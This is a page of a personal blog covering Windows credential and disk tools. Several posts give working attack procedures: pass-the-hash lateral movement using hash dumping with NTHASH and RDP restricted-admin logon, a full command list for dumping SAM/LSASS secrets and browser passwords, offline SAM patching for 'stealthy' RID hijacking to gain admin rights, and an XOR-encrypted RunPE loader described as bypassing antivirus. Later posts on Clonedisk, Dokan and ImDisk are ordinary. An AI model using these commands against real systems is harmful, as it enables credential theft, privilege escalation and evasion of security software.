Erwan's Blog – Page 4 – Yes : again another blog…

Demonstrating lateral movement with NTHASH part #1

Oct 282019

Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).

1.Retrieve the hash
NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

2.Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

You will end up logged as the « username » account in a RDP console on server named « target ».

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

And you never had to enter the « username » password…

Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)

This will be covered in future articles.

NTHASH

nthash 1 Response »

Oct 282019

Dont ask about the name : yes it does not mean much but this is all I got so far…

A tribute to https://github.com/gentilkiwi/mimikatz…
And generally speaking a tool to handle windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.

Source code on github here.

Command line so far:

Command line as below:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /dumphash /rid:123 [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /runwmi /binary:c:\folder\bin.exe [/server:hostname]
NTHASH /enumpriv
NTHASH /dumpprocess /pid:12345
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /a_command /verbose
NTHASH /a_command /system

Decrypt firefox passwords

Uncategorized No Responses »

Oct 282019

Another source code to decrypt firefox passwords.

Source code is available on github here.

Will decrypt firefox passwords on old and new versions in both x86/x64 bits whether using txt, json or sqlite databases.

OfflineReg and RID hijacking

offlinereg No Responses »

Août 182019

Following a post here on how to blank an account’s password using offlinereg, this time, lets see how to perform « RID hijacking ».

The local admin account has a 01F4 rid.
What about « patching » another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite « stealthy » as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy…

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.

Download/Discuss it here

dokan-delphi

Uncategorized No Responses »

Juil 252019

Create your own filesystem and mount it as either a logical drive or folder. Dokan (https://github.com/dokan-dev/dokany)

Below a simple command line to mount a zip archive on X:
mount.exe /r test.zip /l x /x proxy_7zip.dll

Mount.exe is a generic code/binary independant of the filesystem you wish to create.
The filesystem is implemented in a proxy/dll.

Source code and binaries is available here.

7zip proxy example is here.

NFS proxy example is here.

VirtualBox image (VDI) proxy for ImDisk

Uncategorized No Responses »

Juil 252019

I had done a few proxies for ImDisk in the past based on the libyal libraries (vmdk, qcow, vhd, ewf).

This time, as the VDI image format is quite simple, I made my own proxy for VDI images.

Imdisk + Discutils could achieve the same except that discutils requires .Net 4.0 which is not always available.

As always the command line :

« server » -> devio –dll=proxy.dll;dllopen shm:test_proxy c:\temp\freedos.vdi

« client » -> imdisk -a -t proxy -o shm -o ro -f test_proxy -m x:

Use the start command in front of devio if you want to stuff it all in one batch.

Download/Discuss here.

RunPE

Uncategorized No Responses »

Juil 222019

A demo to run a encrypted xored encrypted PE within the memory of another PE (and therefore possibly bypass anti virus softwares)

See https://github.com/erwan2212/XOR-freepascal about xoring / encrypting a file.

Code is currently set to use cmd.exe (x86/x64) as target host.

host32.exe/host64.exe are also provided in the zip if you wish the modify the code to use a « neutral » host.

Source code and binaries can be found here.

Clonedisk update : choose your sector size (logical and physical) when creating a new VHD

clonedisk 7 Responses »

Mai 122019

Clonedisk can now create Microsoft Virtual Hard Disks with different sector sizes (logical and physical).

Furthermore, while creating a new VHD, Clonedisk can also create the partition on the fly.

Clonedisk update : backup/restore over the network

clonedisk 1 Response »

Mai 082019

I have added Netcat as a mean to backup/restore over the network.

See possible netcat commands here.

Clonedisk update : new formats supported

clonedisk No Responses »

Mai 082019

I have added a 2 extra formats in latest version : VHD/VHDX and LZ4.

VHD/VHDX is using MS virtual disk API and LZ4 is using opensource LZ4 library.

While at it, I also added extra WIM compression methods (LZX and LZMS).

LZ4 is quite interesting as in some cases it is faster to compress thru LZ4 compared to using a RAW format and this despite the CPU overhead.

LZ4 files generated by Clonedisk are compatible with LZ4.exe.

Older Entries Newer Entries